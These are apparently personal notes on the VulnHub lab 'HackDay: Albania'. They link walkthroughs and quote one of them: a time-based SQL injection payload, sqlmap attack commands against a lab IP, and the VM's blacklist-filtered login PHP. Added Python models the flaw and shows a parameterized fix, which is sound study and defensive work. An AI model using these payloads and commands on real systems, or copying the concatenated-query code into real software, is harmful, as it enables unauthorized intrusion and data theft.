
39 VM : HackDay: Albania

https://www.vulnhub.com/entry/hackday-albania,167/


Walkthru:

A. https://github.com/DavidBrosnan/Walkthroughs/wiki/Hackday-Albania [directory hopping using wfuzz, sql injection, sqlmap, file type restriction upload php reverse shell as jpg, msfvenom, meterpreter, no python 2.7 or gcc, password in config.php, mysql> prompt, outfile from mysql, writable passwd file, adding a root user/pwd to passwd file]

B. http://security-geek.in/2017/02/08/vulnhub-hack-a-day-albania/ []

C. https://g0blin.co.uk/albania-vulnhub-writeup/ [dirsearch, sqlmap time-based blind attack, why the username field is susceptible to attack while the password field isn't, port forward in our meterpreter session]

Notes:


xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Walkthru C: I note in sqlmap that we were redirected to index.php when triggering the payload. Let's try entering the generated payload of username=test' RLIKE SLEEP(5)-- smYE as our username, and see why we're being redirected to index.php. Tried to log in with it, and I was in.

root@kali:~# sqlmap -u 192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/login.php --data "username=test*&password=ing" --threads 10 --random-agent --risk 3 --level 5


root@kali:~# sqlmap -u 192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/login.php --data "username=test*&password=ing" --threads 10 --random-agent --risk 3 --level 5 --technique T
--technique T = time-based blind attack

Ok - obviously the login function must be defined in config.php, so let's see what we've got. I cat out the contents of config.php, and find the check_login function.
function check_login($username,$password){
    // Keyword blacklist: only OR, UNION and AND are removed (case-insensitive), nothing else
    $username = str_ireplace("OR", "", $username);
    $username = str_ireplace("UNION", "", $username);
    $username = str_ireplace("AND", "", $username);
    // The single quote is stripped from the password only, never from the username
    $password = str_ireplace("'","",$password);
    // Both values are concatenated straight into the query text
    $sql_query = "SELECT ID FROM klienti where `username` = '$username' and `password` = '$password';";
    $result = mysqli_fetch_assoc(execute_query($sql_query));
    $result = $result["ID"];
    if($result >= 1){
        return $result;
    }else{
        return -1;
    }
}
Ok - so we were unable to retrieve any data with the usual techniques, because a number of key SQL keywords are stripped out. The reason the username field is the only vulnerable parameter is that the ' character is stripped from the password field but not from the username field.
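As an added example (not code from the page or from the VM), the Python below models the check_login blacklist next to a parameterized rewrite. The klienti table and its row are constructed sample data in sqlite, and RLIKE/SLEEP are MySQL-only, so the point shown is that the payload survives the keyword filter and breaks the quoting, while the parameterized query simply treats it as a username that does not exist.

```python
import re
import sqlite3

# Mirror of the config.php blacklist, applied in the same order as the page's code:
# str_ireplace("OR"/"UNION"/"AND", "", $username) and str_ireplace("'", "", $password).
def filter_username(username: str) -> str:
    for word in ("OR", "UNION", "AND"):
        username = re.sub(re.escape(word), "", username, flags=re.IGNORECASE)
    return username

def filter_password(password: str) -> str:
    return password.replace("'", "")

def build_vulnerable_query(username: str, password: str) -> str:
    """The query text exactly as check_login() concatenates it."""
    u, p = filter_username(username), filter_password(password)
    return f"SELECT ID FROM klienti where `username` = '{u}' and `password` = '{p}';"

def quote_balanced(query: str) -> bool:
    """Cheap review/detection heuristic: an odd number of single quotes means
    user input has broken out of its string literal."""
    return query.count("'") % 2 == 0

# --- hardened version: parameters never become part of the SQL text ---
def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the VM's klienti table (sqlite here, MySQL on the VM).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE klienti (ID INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO klienti VALUES (1, 'alice', 'correct-horse')")
    conn.commit()
    return conn

def check_login_safe(conn: sqlite3.Connection, username: str, password: str) -> int:
    """Same contract as check_login (ID or -1), but with bound parameters,
    so no blacklist is needed and quotes in either field are harmless."""
    row = conn.execute(
        "SELECT ID FROM klienti WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else -1
```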
